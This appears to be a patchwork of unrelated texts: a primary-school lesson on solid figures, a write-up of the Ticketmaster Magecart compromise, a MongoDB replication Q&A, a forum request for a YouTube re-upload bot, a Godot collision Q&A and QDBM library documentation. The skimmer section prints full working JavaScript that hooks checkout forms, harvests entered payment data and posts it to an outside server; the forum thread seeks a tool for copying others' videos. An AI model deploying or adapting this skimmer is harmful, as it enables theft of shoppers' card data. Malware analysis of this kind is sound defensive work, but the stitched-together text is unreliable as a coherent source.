B. Activity group 2: Match column A (2D shapes) to column B (3D shapes). (The matching items were shown as pictures of 2D and 3D shapes.)

C. Activity group 3: Identify how many edges, faces and vertices the solid figures below have.
HEXAGONAL PRISM
EDGES: 18
FACES: 8
VERTICES: 12

PENTAGONAL PYRAMID
EDGES: 10
FACES: 6
VERTICES: 6

D. Activity group 4: Write a check (/) if the picture shows a solid figure and a cross (x) if it does not.
1. __________ (x)
2. __________ (/)
3. __________ (x)
4. __________ (/)
5. __________ (/)

IV. Evaluation: Complete the table below.

Solid Figure | Illustration (draw the figure) | Number of vertices | Number of faces | Number of edges
Rectangular prism | | | |
Square pyramid | | | |
Cube | | | |
Triangular prism | | | |
Rectangular pyramid | | | |

V. Assignment
1. Draw and color a robot using solid figures.

Prepared by:
LEOLEN P. BAGAYAN
Grade VI Adviser
Ticketmaster magecart skimmer

Ticketmaster's checkout page included a third-party JavaScript resource hosted by Inbenta. Inbenta and this script became compromised, with an obfuscated payload added. The deobfuscated code is below and shows the skimmer grabbing payment data from form input values and sending it to a third-party server. If you have the obfuscated code, please submit it as a sample.

Payload

var skimmer = {
    snd: null,
    gate: "https://webfotce.me/js/form.js",
    myid: (function(cname) {
        var cd = document.cookie.match(new RegExp("(?:^|;)" + cname.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, "\\$1") + "=([^;]*)"));
        return cd ? decodeURIComponent(cd[1]) : undefined
    })("setidd") || (function() {
        var d = new Date();
        var time_id = d.getTime() + "-" + Math.floor(Math.random() * (999999999 - 111111111 + 1) + 111111111);
        var exp = new Date(new Date().getTime() + 60 * 60 * 24 * 1000);
        document.cookie = "setidd=" + time_id + "; path=/; expires=" + exp.toUTCString();
        return time_id
    })(),
    clk: function() {
        skimmer.snd = null;
        var inp = document.querySelectorAll("input, select, textarea, checkbox, button");
        for (var i = 0; i < inp.length; i++) {
            if (inp[i].value.length > 0) {
                var nme = inp[i].name;
                if (nme == "") {
                    nme = i
                };
                skimmer.snd += inp[i].name + "=" + inp[i].value + "&"
            }
        }
    },
    send: function() {
        try {
            var btn = document.querySelectorAll("a[href*=\"javascript:void(0)\"], button, input, submit, .btn, .button");
            for (var i = 0; i < btn.length; i++) {
                var b = btn[i];
                if (b.type != "text" && b.type != "select" && b.type != "checkbox" && b.type != "password" && b.type != "radio") {
                    if (b.addEventListener) {
                        b.addEventListener("click", skimmer.clk, false)
                    } else {
                        b.attachEvent("onclick", skimmer.clk)
                    }
                }
            };
            var frm = document.querySelectorAll("form");
            for (var i = 0; i < frm.length; i++) {
                if (frm[i].addEventListener) {
                    frm[i].addEventListener("submit", skimmer.clk, false)
                } else {
                    frm[i].attachEvent("onsubmit", skimmer.clk)
                }
            };
            if (skimmer.snd != null) {
                var hostname = location.hostname.split(".").slice(0).join("_") || "nodomain";
                var enc_info = btoa(skimmer.snd);
                var http = new XMLHttpRequest();
                http.open("POST", skimmer.gate, true);
                http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                http.send("info=" + enc_info + "&hostname=ticketmUK&key=" + skimmer.myid)
            };
            skimmer.snd = null;
            enc_info = null;
            setTimeout(function() {
                skimmer.send()
            }, 30)
        } catch (e) {}
    }
};
if ((new RegExp("order|checkout|onestep", "gi")).test(window.location)) {
    skimmer.send()
}
My setup: I have 2 hosts, and 2 shards each.

• Host1 has 2 shards, and is the master of the replicas
• Host2 has the secondaries of the 2 shards.

• host1: shard1 (repset1), shard2 (repset2)
• host2: shard1 (repset1), shard2 (repset2)

There's also a 3rd host that acts as arbiter.

I have 50 threads writing randomly to both shards (using a hash) via mongos, with the REPLICA_SAFE WriteConcern set on each insert.

The questions:

1. mongostat displays about 90% locked for both shards on host1 and about 1% locked on host2. Since I use REPLICA_SAFE, which supposedly writes to both servers, shouldn't the locks be the same?
2. mongostat reports qr=30 for both shards of host1, and qw=0 always. Since I perform only writes, how is this possible? Moreover, on host2 all queues are reported as 0. Faults are about the same on all shards/hosts (around 80).
3. netIn/netOut on the secondaries (host2) are always about 200 bytes/sec. Too low.
4. mongos has 53 connections, host1's shards have 71 and 71, and host2's shards have 9 and 8. How is this?

Comment: Which version of mongo are you running? If >= 2.2.x, are those lock statistics for the collection in question, global, or aggregate? – daveh

Answer:

Be careful with running multiple instances of mongod on one host: they compete for system resources. Alternatively, run VMs with dedicated RAM and CPUs (that's how you could use those 24-core systems more efficiently with MongoDB ;)

Answer:

Sivann, it looks like you are using mongo < 2.0; if you are not, that may change things. You say you are using REPLICA_SAFE: which w level are you using? If it's w:1 then you are simply confirming that the writes to your primary have succeeded; you should use w:2 to confirm the writes have reached your secondary.

1. Replication will account for this. Your inserts take a write lock as they insert, and this blocks the replication from reading the data to replicate.
2. This reinforces point 1: your replication reads are queueing behind the writes from the inserts. Faults are probably the issue here, as your system needs to page into RAM the data that is to be read for replication, which is yielding its lock. You are also likely seeing contention between your two primaries for RAM, for the reasons mentioned in the other answer.
3. Seems low, but I can't be certain. It's likely that your systems are waiting to page data into RAM, or for a write lock, in order to replicate it.
4. You can see which connections go where from within the log files. Without knowing what is where, I could not tell you why. That said, the number of connections here does not seem unreasonable.

Comment: I'm using mongo 2.2 – sivann
Is this Possible? Youtube bot/script.
Discussion in 'YouTube' started by onthegoaudio1, Jan 6, 2011.

1. onthegoaudio1 (Regular Member):

I am looking to have a bot or a script made that can do this:

-Search YouTube for a specific keyword. Let's say we want all the videos with www.123456.com in the description.
-Download all the videos that are scraped.
-Re-upload them with the same titles, descriptions, keywords, etc. as the videos scraped.

So basically it would be doing what the YouTube Advertiser "DUO" feature does, BUT it would keep the same titles, descriptions, and keywords.

Anyone have any input on this? If in fact it is possible, where can I find someone to complete it?

2. own007 (Regular Member):

It isn't a good idea to keep the original titles and tags. YouTube is much more sophisticated than that.

3. newman123 (Junior Member):

I'd agree. They'd be pretty quick to notice if the exact same videos with the exact same titles and tags are going up.
why are my bullets not colliding with enemies

:information_source: Attention: Topic was automatically imported from the old Question2Answer platform.
:bust_in_silhouette: Asked By DoofusDonald

Sometimes the bullets collide, but most of the time they just go right through each other. The bullet is a RigidBody2D with only a sprite and a collision shape. The enemy is a KinematicBody2D with a sprite, a collision shape, and an Area2D, and the Area2D has another collision shape.

The code for the bullet is:

    if Input.is_action_just_pressed("LMB"):
        fire()

    func fire():
        var bullet_instance = bullet.instance()
        bullet_instance.position = get_global_position()
        bullet_instance.rotation_degrees = rotation_degrees
        bullet_instance.apply_impulse(Vector2(), Vector2(bullet_speed, 0).rotated(rotation))
        get_tree().get_root().call_deferred("add_child", bullet_instance)

and it is inside the player node. The code for the enemy is:

    extends KinematicBody2D

    var motion = Vector2()

    func _physics_process(_delta):
        var player = get_parent().get_node("Player")
        position += (player.position - position) / 50
        look_at(player.position)
        move_and_collide(motion)

So does anyone know a fix for this?

:bust_in_silhouette: Reply From: johnygames

This usually happens when a projectile moves too fast. The way collision works is by checking where the projectile is every frame and whether a collision shape has been entered. The engine calculates where the object is going to be in the next frame, and if there is no object in the calculated position, the object keeps moving along its trajectory. If an object moves too fast and the collision shape is too thin, the collision is not detected: the thickness of the collision shape has to be greater than the distance traveled in a frame, or else the object passes right THROUGH the obstacle, because it never finds itself IN the obstacle.

A way to combat this would be to use thicker collision shapes, but I understand that this is impractical since we are talking about tiny bullets. Another thing you can try is to tweak the Continuous Cd setting from the inspector menu of the rigid body. This leads to more accurate collisions at the cost of performance (at least for 3D physics). I haven't used this setting, but there is a "Cast Ray" option under Continuous Cd, which I guess is what you want. Generally speaking, you cast a ray to see what it hits. Check this out for more info. Raycasting works better for bullets because rays detect obstacles along the bullet's path more quickly and accurately. (A sketch of enabling this from code follows below.)

Another piece of advice would be to do all updating in the _physics_process(delta) function instead of _process(delta), since you are dealing with physics and you want actions to be synced with the physics engine.

:bust_in_silhouette: Reply From: mdubaisi

What about turning the bullet into an Area2D? You can watch these videos: https://www.youtube.com/watch?v=UpTlc51dGhQ&list=PLyckz_-Rzq6ClGevL2fneJ5YJnMPKWa4M&index=6
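As a concrete follow-up to the Continuous Cd suggestion above, here is a minimal sketch, assuming Godot 3.x and that the bullet scene's root node is the RigidBody2D (the rest of the setup is hypothetical); it enables ray-cast continuous collision detection from the bullet's own script instead of the inspector:

    extends RigidBody2D

    func _ready():
        # Ray-cast CCD: the physics engine sweeps a ray along the body's path
        # each physics step, so a fast bullet can't tunnel through a thin
        # collision shape between two frames.
        continuous_cd = RigidBody2D.CCD_MODE_CAST_RAY

Since CCD is a per-body setting, it should only need to be enabled on the bullet, not on the enemies.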
QDBM Quick Database Manager

QDBM is a library of routines for managing a database; this package also provides the QDBM database commands to be used as CGI commands. The database is a simple data file containing records, each of which is a pair of a key and a value. Every key and value is a series of bytes of variable length; both binary data and character strings can be used as keys and values. There is no concept of data tables or data types. Records are organized in a hash table or a B+ tree.

In a hash-table database, each key must be unique within the database, so it is impossible to store two or more records with overlapping keys. The following access methods are provided: storing a record with a key and a value, deleting a record by key, and retrieving a record by key. Moreover, traversal access to every key is provided, although the order is arbitrary. These access methods are similar to those of the DBM library (and its followers NDBM and GDBM) defined in the UNIX standard. QDBM is an alternative to DBM because of its higher performance.

In a B+ tree database, records with duplicated keys can be stored. Access methods for storing, deleting, and retrieving are provided as with the hash-table database. Records are stored in order by a comparison function assigned by the user, and it is possible to access each record with a cursor, in ascending or descending order. This mechanism enables forward-matching search for strings and range search for integers. Moreover, transactions are available in B+ tree databases.

Effective Implementation of Hash Database

QDBM was developed with reference to GDBM for the purpose of three improvements: higher processing speed, smaller database files, and a simpler API. All three have been achieved. Moreover, the following three restrictions of traditional DBM are removed: a process can handle only one database; the size of a key and a value is bounded; the database file is sparse.

QDBM uses a hash algorithm to retrieve records. If the bucket array has a sufficient number of elements, the time complexity of retrieval is O(1); that is, the time required for retrieving a record is constant, regardless of the scale of the database. The same holds for storing and deleting. Collisions of hash values are managed by separate chaining, with binary search trees as the data structure of the chains. Even if the bucket array has unusually few elements, the time complexity of retrieval is O(log n).

QDBM speeds up retrieval by loading the whole bucket array into RAM. If the bucket array is in RAM, it is possible to access the region of a target record with about one path of file operations. The bucket array saved in a file is not read into RAM with the 'read' call but directly mapped to RAM with the 'mmap' call. Therefore, preparation time on connecting to a database is very short, and two or more processes can share the same memory map.
If the number of elements in the bucket array is about half the number of records stored in the database then, although it depends on the characteristics of the input, the probability of a hash-value collision is about 56.7% (36.8% if the counts are equal, 21.3% with twice as many elements, 11.5% with four times, 6.0% with eight times). In such a case, a record can be retrieved with two or fewer paths of file operations. As a sizing rule: to handle a database containing one million records, a bucket array with half a million elements is needed. The size of each element is 4 bytes; that is, with 2MB of RAM available, a database containing one million records can be handled.

QDBM provides two modes for connecting to a database: 'reader' and 'writer'. A reader can retrieve but can neither store nor delete; a writer can perform all access methods. Exclusion control between processes is performed on connection by file locking. While a writer is connected to a database, neither readers nor writers can connect. While a reader is connected, other readers can connect, but writers cannot. This mechanism guarantees data consistency under simultaneous connections in a multitasking environment.

Traditional DBM provides two modes for the storing operation: 'insert' and 'replace'. In case a key overlaps an existing record, the insert mode keeps the existing value, while the replace mode overwrites it with the specified value. In addition to these two modes, QDBM provides a 'concatenate' mode, in which the specified value is appended to the end of the existing value. This feature is useful when a value is treated as an array to which elements are added. Moreover, while DBM can fetch a value from a database only by reading the whole region of a record, QDBM can fetch part of the region of a value, which is also useful when a value is treated as an array. (The sample program at the end of this article sketches these storing modes.)

Generally speaking, repeated updating fragments the available regions, and the size of the database grows rapidly. QDBM deals with this problem by coalescing and reusing dispensable regions, and by featuring database optimization. When overwriting a record with a value larger than the existing one, the record's region must be moved to another position in the file. Because the time complexity of that operation depends on the size of the record's region, extending values successively is inefficient; QDBM deals with this by alignment: if the increment fits in the padding, the region does not need to be moved.

Many file systems cannot handle a file larger than 2GB. To deal with this, QDBM provides a directory database containing multiple database files, making it possible to handle a database whose total size is up to 1TB in theory. Moreover, because the database files can be deployed on multiple disks, the speed of updating operations can be improved as with RAID-0 (striping); the files can also be deployed on multiple file servers using NFS and the like.

Useful Implementation of B+ Tree Database

Although a B+ tree database is slower than a hash database, it features ordered access to records, with the order assigned by the user. Records in a B+ tree are sorted and arranged in logical pages, and a sparse index organized as a B-tree (a multiway balanced tree) is maintained for each page.
Thus, the time complexity of retrieval and similar operations is O(log n). A cursor is provided to access records in order; it can jump to a position specified by a key and can step forward or backward from the current position. Because the pages are arranged as a doubly linked list, the time complexity of stepping the cursor is O(1).

The B+ tree database is implemented on top of the hash database described above. Because each page of the B+ tree is stored as a record of the hash database, the B+ tree database inherits the storage-management efficiency of the hash database. Because each record header is smaller and the alignment of each page is calculated statistically, in most cases the database file is half the size of a hash database. Although updating a B+ tree requires operating on many pages, QDBM expedites the process by caching pages and reducing file operations. In most cases, because the whole sparse index is cached in memory, a record can be retrieved with one or fewer paths of file operations.

The B+ tree database features a transaction mechanism. It is possible to commit a series of operations between the beginning and end of a transaction in a lump, or to abort the transaction and roll back to the state before it began. Even if the application process crashes during a transaction, the database file is not broken.

If QDBM is built with ZLIB, LZO, or BZIP2 (lossless data-compression libraries) enabled, the content of each B+ tree page is compressed before being stored in the file. Because the records in a page have similar patterns, high compression efficiency is expected from the Lempel-Ziv algorithm and the like. When handling text data, the size of the database is reduced to about 25%. If the database is large and disk I/O is the bottleneck, enabling compression improves processing speed to a large extent.

Simple But Various Interfaces

QDBM provides very simple APIs. You can perform database I/O much like ordinary file I/O with the 'FILE' pointer defined in ANSI C. In the basic API of QDBM, a database is recorded as one file; in the extended API, it is recorded as several files in one directory. Because the two APIs are very similar, porting an application from one to the other is easy.

APIs compatible with NDBM and GDBM are also provided. As there are many applications using NDBM or GDBM, it is easy to port them onto QDBM; in most cases it takes only a replacement of the header include (#include) and recompiling. However, QDBM cannot handle database files made by the original NDBM or GDBM.

To handle records in memory easily, the utility API is provided. It implements memory-allocating functions, sorting functions, extensible datums, array lists, hash maps, and so on. Using them, you can handle records in C as cheaply as in such script languages as Perl or Ruby.

The B+ tree database is used through the advanced API, which is implemented using the basic API and the utility API. Because the advanced API is also similar to the basic and extended APIs, it is easy to learn how to use.

To handle the inverted index used by full-text search systems, the inverted API is provided. If an inverted index of documents is easy to handle, an application can focus on text processing and natural language processing.
Because this API depends on neither character codes nor languages, it is possible to implement a full-text search system that can respond to various requests from users.

Along with the APIs for C, QDBM provides APIs for C++, Java, Perl, and Ruby. The APIs for C are composed of seven kinds: the basic API, the extended API, the NDBM-compatible API, the GDBM-compatible API, the utility API, the advanced API, and the inverted API. Command-line interfaces corresponding to each API are also provided; they are useful for prototyping, testing, debugging, and so on. The C++ API encapsulates the database-handling functions of the basic, extended, and advanced APIs with the class mechanism of C++. The Java API has native methods calling the basic, extended, and advanced APIs through the Java Native Interface. The Perl API has methods calling them via the XS language, and the Ruby API calls them as Ruby modules. Moreover, CGI scripts for database administration and full-text search are provided.

Wide Portability

QDBM is implemented based on the syntax of ANSI C (C89) and uses only APIs defined in ANSI C or POSIX, so it works on most UNIX and UNIX-compatible OSs. As for the C API, operation has been checked at least on Linux 2.2, Linux 2.4, FreeBSD 4.8, FreeBSD 5.0, SunOS 5.7, SunOS 5.8, SunOS 5.9, HP-UX 11.00, Cygwin 1.3.10, Mac OS X 10.2, and RISC OS 5.03. Although a database file created by QDBM depends on the byte order of the processor, utilities are provided to dump data in a byte-order-independent format.

Building

To build a program using QDBM, link it with the library file 'libqdbm.a' or 'libqdbm.so'. For example, the following command builds 'sample' from 'sample.c':

    gcc -I/usr/local/include -o sample sample.c -L/usr/local/lib -lqdbm
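As a rough illustration of what such a 'sample.c' could look like, here is a sketch against the basic (Depot) API. The database file name is hypothetical, and the program is meant as an example of the storing modes described earlier (DP_DOVER to overwrite, DP_DCAT to concatenate), not as the canonical sample shipped with QDBM:

    #include <depot.h>
    #include <stdlib.h>
    #include <stdio.h>

    #define DBNAME "book"   /* hypothetical database file name */

    int main(void) {
        DEPOT *depot;
        char *val;
        /* open the database as a writer, creating it if it does not exist */
        if (!(depot = dpopen(DBNAME, DP_OWRITER | DP_OCREAT, -1))) {
            fprintf(stderr, "dpopen: %s\n", dperrmsg(dpecode));
            return 1;
        }
        /* store a record, overwriting any existing value */
        if (!dpput(depot, "mikio", -1, "000-1234-5678", -1, DP_DOVER)) {
            fprintf(stderr, "dpput: %s\n", dperrmsg(dpecode));
        }
        /* extend the value with the 'concatenate' storing mode */
        if (!dpput(depot, "mikio", -1, " ext.101", -1, DP_DCAT)) {
            fprintf(stderr, "dpput: %s\n", dperrmsg(dpecode));
        }
        /* retrieve the record; the returned region is freed by the caller */
        if (!(val = dpget(depot, "mikio", -1, 0, -1, NULL))) {
            fprintf(stderr, "dpget: %s\n", dperrmsg(dpecode));
        } else {
            printf("mikio: %s\n", val);
            free(val);
        }
        /* close the database */
        if (!dpclose(depot)) {
            fprintf(stderr, "dpclose: %s\n", dperrmsg(dpecode));
        }
        return 0;
    }

Built with the gcc command above, this stores, extends, and fetches a single record. The third argument of dpopen is the number of bucket-array elements (-1 selects the default); this is where the sizing rule from earlier, about half the number of expected records, comes into play.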